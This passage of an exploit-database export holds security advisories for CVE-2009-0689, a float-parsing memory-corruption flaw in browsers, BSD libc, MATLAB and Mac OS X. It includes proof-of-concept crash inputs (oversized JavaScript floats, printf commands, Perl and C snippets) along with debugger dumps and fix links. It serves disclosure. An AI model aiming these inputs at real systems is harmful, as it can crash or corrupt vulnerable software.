Proof of Concept (PoC) ---\r\n\r\n- -----------------------\r\n<script>\r\nvar a=0.<?php echo str_repeat(\"9\",299999); ?>;\r\n</script>\r\n- -----------------------\r\n\r\nIf we use konqueror to see this PoC, konqueror will crash. For example\r\n\r\n- -----------------------\r\n<script>\r\nvar a=0.<?php echo str_repeat(\"1\",296450); ?>;\r\n</script>\r\n- -----------------------\r\n\r\nProgram received signal SIGSEGV, Segmentation fault.\r\n[Switching to process 24845, thread 0x7e6e6800]\r\n0x090985c3 in diff () from /usr/local/lib/libkjs.so.5.0\r\n\r\n0x06db85c3 <diff+163>: mov %esi,(%ecx)\r\n\r\n#0 0x090985c3 in diff () from /usr/local/lib/libkjs.so.5.0\r\n#1 0x0909901b in kjs_strtod () from /usr/local/lib/libkjs.so.5.0\r\n#2 0x090738e5 in KJS::Lexer::lex () from /usr/local/lib/libkjs.so.5.0\r\n#3 0x0907300c in kjsyylex () from /usr/local/lib/libkjs.so.5.0\r\n#4 0x09072f86 in kjsyyparse () from /usr/local/lib/libkjs.so.5.0\r\n#5 0x090805cf in KJS::Parser::parse () from /usr/local/lib/libkjs.so.5.0\r\n#6 0x0908337f in KJS::InterpreterImp::evaluate ()\r\n\r\n(gdb) i r\r\neax 0x0 0\r\necx 0x220ff000 571469824\r\nedx 0x0 0\r\nebx 0x220fbb00 571456256\r\nesp 0xcfbc04e0 0xcfbc04e0\r\nebp 0xcfbc0518 0xcfbc0518\r\nesi 0xc71c71c7 -954437177\r\nedi 0x0 0\r\neip 0x21415c3 0x21415c3\r\n\r\nesi=0x71c71c7\r\n\r\n\r\n- --- 3. SecurityReason Note ---\r\n\r\nOfficialy SREASONRES:20090625 has been detected in:\r\n- - OpenBSD\r\n- - NetBSD\r\n- - FreeBSD\r\n- - MacOSX\r\n- - Google Chrome\r\n- - Mozilla Firefox\r\n- - Mozilla Seamonkey\r\n- - KDE (example: konqueror)\r\n- - Opera\r\n- - K-Meleon\r\n\r\nThis list is not yet closed. US-CERT declared that will inform all\r\nvendors about this issue, however, they did not do it. Even greater\r\nconfusion caused new CVE number \"CVE-2009-1563\". 
Secunia has informed\r\nthat this vulnerability was only detected in Mozilla Firefox, but nobody\r\nwas aware that the problem affects other products like ( KDE, Chrome )\r\nand it is based on \"CVE-2009-0689\". After some time Mozilla Foundation\r\nSecurity Advisory\r\n(\"http://www.mozilla.org/security/announce/2009/mfsa2009-59.html\";)\r\nwas updated with note :\r\n\"The underlying flaw in the dtoa routines used by Mozilla appears to be\r\nessentially the same as that reported against the libc gdtoa routine by\r\nMaksymilian Arciemowicz ( CVE-2009-0689)\".\r\nThis fact ( new CVE number for Firefox Vulnerability )and PoC in\r\njavascript (from Secunia), forced us to official notification all other\r\nvendors. We publish all the individual advisories, to formally show all\r\nvulnerable software and to avoid wrong CVE number. We do not see any\r\nother way to fix this issue in all products.\r\n\r\n\r\n- --- 4. Fix ---\r\nNetBSD fix (optimal):\r\nhttp://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h\r\n\r\nOpenBSD 
fix:\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb
/src/lib/libc/gdtoa/strtoIx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c\r\n\r\n\r\n- --- 5. Credits ---\r\nDiscovered by Maksymilian Arciemowicz and sp3x from SecurityReason.com.\r\n\r\n\r\n- --- 6. Greets ---\r\nInfospec p_e_a pi3\r\n\r\n\r\n- --- 7. 
Contact ---\r\nEmail:\r\n- - cxib {a.t] securityreason [d0t} com\r\n- - sp3x {a.t] securityreason [d0t} com\r\n\r\nGPG:\r\n- - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg\r\n- - http://securityreason.com/key/sp3x.gpg\r\n\r\nhttp://securityreason.com/\r\nhttp://securityreason.pl/\r\n\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\n\r\niEYEARECAAYFAksF4lEACgkQpiCeOKaYa9ZD+ACfSoaEiTeQrFDgtcHgOckyXMom\r\nTE4AoJW3meP7KP6Xb7KNErVlsluLUO8E\r\n=jTmp\r\n-----END PGP SIGNATURE-----\r\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/10184/"}, {"lastseen": "2016-02-03T18:55:31", "description": "Mozilla Firefox 3.5.3 Floating Point Conversion Heap Overflow Vulnerability. CVE-2009-0689. Dos exploit for linux platform", "published": "2009-10-27T00:00:00", "type": "exploitdb", "title": "Mozilla Firefox <= 3.5.3 - Floating Point Conversion Heap Overflow Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0689"], "modified": "2009-10-27T00:00:00", "id": "EDB-ID:33312", "href": "https://www.exploit-db.com/exploits/33312/", "sourceData": "source: http://www.securityfocus.com/bid/36851/info\r\n\r\nMozilla Firefox is prone to a heap-based buffer-overflow vulnerability.\r\n\r\nAn attacker can exploit this issue by tricking a victim into visiting a malicious webpage to execute arbitrary code and to cause denial-of-service conditions.\r\n\r\nNOTE: This issue was previously covered in BID 36843 (Mozilla Firefox and SeaMonkey MFSA 2009-52 through -64 Multiple Vulnerabilities).\r\n\r\nNOTE 2: This issue is related to BID 35510 (Multiple BSD Distributions 'gdtoa/misc.c' Memory Corruption Vulnerability), but because of differences in the code base, it is being assigned its own record.\r\n\r\n<script>\r\nvar a=0.<?php echo str_repeat(\"1\",296450); ?>;\r\n</script> ", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, 
"sourceHref": "https://www.exploit-db.com/download/33312/"}, {"lastseen": "2016-02-03T18:23:14", "description": "Multiple BSD Distributions 'gdtoa/misc.c' Memory Corruption Vulnerability. CVE-2009-0689. Dos exploits for multiple platform", "published": "2009-05-26T00:00:00", "type": "exploitdb", "title": "Multiple BSD Distributions 'gdtoa/misc.c' Memory Corruption Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0689"], "modified": "2009-05-26T00:00:00", "id": "EDB-ID:33058", "href": "https://www.exploit-db.com/exploits/33058/", "sourceData": "source: http://www.securityfocus.com/bid/35510/info\r\n\r\nMultiple BSD distributions are prone to a memory-corruption vulnerability because the software fails to properly bounds-check data used as an array index.\r\n\r\nAttackers may exploit this issue to execute arbitrary code within the context of affected applications.\r\n\r\nThe following are vulnerable:\r\n\r\nOpenBSD 4.5\r\nNetBSD 5.0\r\nFreeBSD 6.4 and 7.2\r\n\r\nOther software based on the BSD code base may also be affected. \r\n\r\nThe following proof-of-concept shell commands are available:\r\n\r\nprintf %1.262159f 1.1\r\nprintf %11.2109999999f\r\nprintf %11.2009999999f\r\nprintf %11.2009999999f\r\n\r\nThe following proof-of-concept Perl script is available:\r\n\r\n#!/usr/local/bin/perl\r\nprintf \"%0.4194310f\", 0x0.0x41414141;\r\n\r\nThe following proof-of-concept J program is available:\r\n\r\ncxib=0.<?php echo str_repeat(\"1\",296450); ?> ", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/33058/"}, {"lastseen": "2016-02-03T19:17:17", "description": "MATLAB R2009b 'dtoa' Implementation Memory Corruption Vulnerability. CVE-2009-0689. 
Dos exploit for linux platform", "published": "2010-01-08T00:00:00", "type": "exploitdb", "title": "MATLAB R2009b - 'dtoa' Implementation Memory Corruption Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0689"], "modified": "2010-01-08T00:00:00", "id": "EDB-ID:33480", "href": "https://www.exploit-db.com/exploits/33480/", "sourceData": "source: http://www.securityfocus.com/bid/37688/info\r\n\r\nMATLAB is prone to a memory-corruption vulnerability because the software fails to properly bounds-check data used as an array index.\r\n\r\nAttackers may exploit this issue to execute arbitrary code within the context of affected applications.\r\n\r\nMATLAB R2009b is affected; other versions may also be vulnerable. \r\n\r\ncxib=0.<?php echo str_repeat(\"1\",296450); ?> ", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/33480/"}, {"lastseen": "2016-02-03T19:17:09", "description": "Mac OS X 10.x 'libc/strtod(3)' Memory Corruption Vulnerability. CVE-2009-0689. Dos exploit for osx platform", "published": "2010-01-08T00:00:00", "type": "exploitdb", "title": "Mac OS X 10.x - 'libc/strtod3' Memory Corruption Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0689"], "modified": "2010-01-08T00:00:00", "id": "EDB-ID:33479", "href": "https://www.exploit-db.com/exploits/33479/", "sourceData": "source: http://www.securityfocus.com/bid/37687/info\r\n\r\nMac OS X is prone to a memory-corruption vulnerability because the software fails to properly bounds-check data used as an array index.\r\n\r\nAttackers may exploit this issue to execute arbitrary code within the context of affected applications.\r\n\r\nMac OS X 10.5 and 10.6 are affected; other versions may also be vulnerable. 
\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\nint main ()\r\n{\r\nchar number[] = \"0.1111111111...11\", *e;\r\ndouble weed = strtod(number, &e);\r\nprintf(\"grams = %lf\\n\", weed);\r\nreturn 0;\r\n} ", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/33479/"}, {"lastseen": "2016-02-01T12:00:22", "description": "K-Meleon 1.5.3 Remote Array Overrun. CVE-2009-0689. Dos exploit for bsd platform", "published": "2009-11-19T00:00:00", "type": "exploitdb", "title": "K-Meleon 1.5.3 - Remote Array Overrun", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0689"], "modified": "2009-11-19T00:00:00", "id": "EDB-ID:10186", "href": "https://www.exploit-db.com/exploits/10186/", "sourceData": "From Full Disclosure: http://seclists.org/fulldisclosure/2009/Nov/222\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n[ K-Meleon 1.5.3 Remote Array Overrun (Arbitrary code execution) ]\r\n\r\nAuthor: Maksymilian Arciemowicz and sp3x\r\nhttp://SecurityReason.com\r\nDate:\r\n- - Dis.: 07.05.2009\r\n- - Pub.: 20.11.2009\r\n\r\nCVE: CVE-2009-0689\r\nRisk: High\r\nRemote: Yes\r\n\r\nAffected Software:\r\n- - K-Meleon 1.5.3\r\n\r\nNOTE: Prior versions may also be affected.\r\n\r\nOriginal URL:\r\nhttp://securityreason.com/achievement_securityalert/72\r\n\r\n\r\n- --- 0.Description ---\r\nK-Meleon is an extremely fast, customizable, lightweight web browser\r\nbased on the Gecko layout engine developed by Mozilla which is also used\r\nby Firefox. K-Meleon is free, open source software released under the\r\nGNU General Public License and is designed specifically for Microsoft\r\nWindows (Win32) operating systems.\r\n\r\n\r\n- --- 1. K-Meleon 1.5.3 Remote Array Overrun (Arbitrary code execution) ---\r\nThe main problem exist in dtoa implementation. K-Meleon has the same\r\ndtoa as a KDE, Opera and all BSD systems. 
This issue has been fixed in\r\nFirefox 3.5.4 and fix\r\n\r\nhttp://securityreason.com/achievement_securityalert/63\r\n\r\nbut fix for SREASONRES:20090625, used by openbsd was not good.\r\nMore information about fix for openbsd and similars SREASONRES:20091030,\r\n\r\nhttp://securityreason.com/achievement_securityalert/69\r\n\r\nWe can create any number of float, which will overwrite the memory. In\r\nKmax has defined 15. Functions in dtoa, don't checks Kmax limit, and it\r\nis possible to call 16<= elements of freelist array.\r\n\r\n\r\n- --- 2. Proof of Concept (PoC) ---\r\n\r\n- -----------------------\r\n<script>\r\nvar a=0.<?php echo str_repeat(\"1\",296450); ?>;\r\n</script>\r\n- -----------------------\r\n\r\nK-Meleon will crash with\r\n\r\nUnhandled exception at 0x01800754 in k-meleon.exe: 0xC0000005: Access\r\nviolation reading location 0x0bc576ec.\r\n\r\n01800754 mov eax,dword ptr [ecx]\r\n\r\nEAX 00000002 \r\nECX 0BC576EC \r\nEDI 028FEB51 \r\n\r\n\r\n- --- 3. SecurityReason Note ---\r\n\r\nOfficialy SREASONRES:20090625 has been detected in:\r\n- - OpenBSD\r\n- - NetBSD\r\n- - FreeBSD\r\n- - MacOSX\r\n- - Google Chrome\r\n- - Mozilla Firefox\r\n- - Mozilla Seamonkey\r\n- - KDE (example: konqueror)\r\n- - Opera\r\n- - K-Meleon\r\n\r\nThis list is not yet closed. US-CERT declared that will inform all\r\nvendors about this issue, however, they did not do it. Even greater\r\nconfusion caused new CVE number \"CVE-2009-1563\". Secunia has informed\r\nthat this vulnerability was only detected in Mozilla Firefox, but nobody\r\nwas aware that the problem affects other products like ( KDE, Chrome )\r\nand it is based on \"CVE-2009-0689\". 
After some time the Mozilla Foundation\r\nSecurity Advisory\r\n(http://www.mozilla.org/security/announce/2009/mfsa2009-59.html)\r\nwas updated with the note:\r\n\"The underlying flaw in the dtoa routines used by Mozilla appears to be\r\nessentially the same as that reported against the libc gdtoa routine by\r\nMaksymilian Arciemowicz ( CVE-2009-0689)\".\r\nThis fact (a new CVE number for the Firefox vulnerability) and the PoC in\r\nJavaScript (from Secunia) forced us to officially notify all other\r\nvendors. We publish all the individual advisories to formally show all\r\nvulnerable software and to avoid a wrong CVE number. We do not see any\r\nother way to fix this issue in all products.\r\n\r\nPlease note:\r\nThe patch used in Firefox 3.5.4 does not fully solve the problem. The dtoa\r\nalgorithm is not optimal and allows a remote Denial of Service in Firefox\r\n3.5.5 when given a long float number.\r\n\r\n\r\n- --- 4. Fix ---\r\nNetBSD fix (optimal):\r\nhttp://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h\r\n\r\nOpenBSD 
fix:\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb
/src/lib/libc/gdtoa/strtoIx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c\r\n\r\n\r\n- --- 5. Credits ---\r\nDiscovered by Maksymilian Arciemowicz and sp3x from SecurityReason.com.\r\n\r\n\r\n- --- 6. Greets ---\r\nInfospec p_e_a pi3\r\n\r\n\r\n- --- 7. 
Contact ---\r\nEmail:\r\n- - cxib {a.t] securityreason [d0t} com\r\n- - sp3x {a.t] securityreason [d0t} com\r\n\r\nGPG:\r\n- - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg\r\n- - http://securityreason.com/key/sp3x.gpg\r\n\r\nhttp://securityreason.com/\r\nhttp://securityreason.pl/\r\n\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\n\r\niEYEARECAAYFAksF4ZoACgkQpiCeOKaYa9bJsACgqjmxJmR9BORNOK3YhNUeyz+o\r\nl8EAn2V+5mXH7GLWp+btWMf+4fGDeIzw\r\n=Zqoe\r\n-----END PGP SIGNATURE-----\r\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/10186/"}, {"lastseen": "2016-02-01T12:00:15", "description": "SeaMonkey 1.1.8 Remote Array Overrun. CVE-2009-0689. Dos exploit for bsd platform", "published": "2009-11-19T00:00:00", "type": "exploitdb", "title": "SeaMonkey 1.1.8 - Remote Array Overrun", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0689"], "modified": "2009-11-19T00:00:00", "id": "EDB-ID:10185", "href": "https://www.exploit-db.com/exploits/10185/", "sourceData": "From Full Disclosure: http://seclists.org/fulldisclosure/2009/Nov/221\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n[ SeaMonkey 1.1.8 Remote Array Overrun (Arbitrary code execution) ]\r\n\r\nAuthor: Maksymilian Arciemowicz and sp3x\r\nhttp://SecurityReason.com\r\nDate:\r\n- - Dis.: 07.05.2009\r\n- - Pub.: 20.11.2009\r\n\r\nCVE: CVE-2009-0689\r\nRisk: High\r\nRemote: Yes\r\n\r\nAffected Software:\r\n- - SeaMonkey 1.1.18\r\n\r\nFixed in:\r\n- - SeaMonkey 2.0\r\n\r\nNOTE: Prior versions may also be affected.\r\n\r\nOriginal URL:\r\nhttp://securityreason.com/achievement_securityalert/71\r\n\r\n\r\n- --- 0.Description ---\r\nThe SeaMonkey project is a community effort to develop the SeaMonkey\r\nall-in-one internet application suite (see below). 
Such a software suite\r\nwas previously made popular by Netscape and Mozilla, and the SeaMonkey\r\nproject continues to develop and deliver high-quality updates to this\r\nconcept. Containing an Internet browser, email & newsgroup client with\r\nan included web feed reader, HTML editor, IRC chat and web development\r\ntools, SeaMonkey is sure to appeal to advanced users, web developers and\r\ncorporate users.\r\n\r\n\r\n- --- 1. SeaMonkey 1.1.18 Remote Array Overrun (Arbitrary code\r\nexecution) ---\r\nThe main problem exists in the dtoa implementation. SeaMonkey has the same\r\ndtoa as KDE, Opera and all BSD systems. This issue has been fixed in\r\nFirefox 3.5.4, and the fix\r\n\r\nhttp://bonsai.mozilla.org/cvsview2.cgi?diff_mode=context&whitespace_mode=show&file=jsdtoa.c&branch=&root=/cvsroot&subdir=mozilla/js/src&command=DIFF_FRAMESET&rev1=3.41&rev2=3.42\r\n\r\nhas been used to patch SeaMonkey 2.0.\r\n\r\nThis flaw was detected in May 2009 and assigned SREASONRES:20090625.\r\n\r\nhttp://securityreason.com/achievement_securityalert/63\r\n\r\nbut the fix for SREASONRES:20090625 used by OpenBSD was not good.\r\nMore information about the fix for OpenBSD and similar systems is in SREASONRES:20091030,\r\n\r\nhttp://securityreason.com/achievement_securityalert/69\r\n\r\nWe can create a float of any length, which will overwrite memory.\r\nKmax is defined as 15. Functions in dtoa don't check the Kmax limit, and it\r\nis possible to reach element 16 or higher of the freelist array.\r\n\r\n\r\n- --- 2. Proof of Concept (PoC) ---\r\n\r\n- -----------------------\r\n<script>\r\nvar a=0.<?php echo str_repeat(\"9\",299999); ?>;\r\n</script>\r\n- -----------------------\r\n\r\nIf we open this PoC in SeaMonkey, SeaMonkey will crash. For example\r\n\r\n- -----------------------\r\n<script>\r\nvar a=0.<?php echo str_repeat(\"1\",296450); ?>;\r\n</script>\r\n- -----------------------\r\n\r\n127# gdb seamonkey-bin seamonkey-bin.core\r\n...\r\n#0 0x28df0ecb in ?? 
()\r\n...\r\n(gdb) i r\r\neax 0x0 0\r\necx 0x2 2\r\nedx 0xbfbfd2fc -1077947652\r\nebx 0x28da9b6c 685415276\r\nesp 0xbfbfd2ac 0xbfbfd2ac\r\nebp 0xbfbfd2c8 0xbfbfd2c8\r\nesi 0xb 11\r\nedi 0xb 11\r\neip 0x28df0ecb 0x28df0ecb\r\n...\r\n\r\nesi = esi = 11\r\n\r\n\r\n- --- 3. SecurityReason Note ---\r\n\r\nOfficially, SREASONRES:20090625 has been detected in:\r\n- - OpenBSD\r\n- - NetBSD\r\n- - FreeBSD\r\n- - MacOSX\r\n- - Google Chrome\r\n- - Mozilla Firefox\r\n- - Mozilla Seamonkey\r\n- - KDE (example: konqueror)\r\n- - Opera\r\n- - K-Meleon\r\n\r\nThis list is not yet closed. US-CERT declared that it would inform all\r\nvendors about this issue; however, they did not do it. Even greater\r\nconfusion was caused by the new CVE number \"CVE-2009-1563\". Secunia informed\r\nthat this vulnerability had only been detected in Mozilla Firefox, but nobody\r\nwas aware that the problem affects other products (KDE, Chrome)\r\nand is based on \"CVE-2009-0689\". After some time the Mozilla Foundation\r\nSecurity Advisory\r\n(http://www.mozilla.org/security/announce/2009/mfsa2009-59.html)\r\nwas updated with the note:\r\n\"The underlying flaw in the dtoa routines used by Mozilla appears to be\r\nessentially the same as that reported against the libc gdtoa routine by\r\nMaksymilian Arciemowicz ( CVE-2009-0689)\".\r\nThis fact (a new CVE number for the Firefox vulnerability) and the PoC in\r\nJavaScript (from Secunia) forced us to officially notify all other\r\nvendors. We publish all the individual advisories to formally show all\r\nvulnerable software and to avoid a wrong CVE number. We do not see any\r\nother way to fix this issue in all products.\r\n\r\nPlease note:\r\nThe patch used in Firefox 3.5.4 does not fully solve the problem. The dtoa\r\nalgorithm is not optimal and allows a remote Denial of Service in Firefox\r\n3.5.5 when given a long float number.\r\n\r\n\r\n- --- 4. 
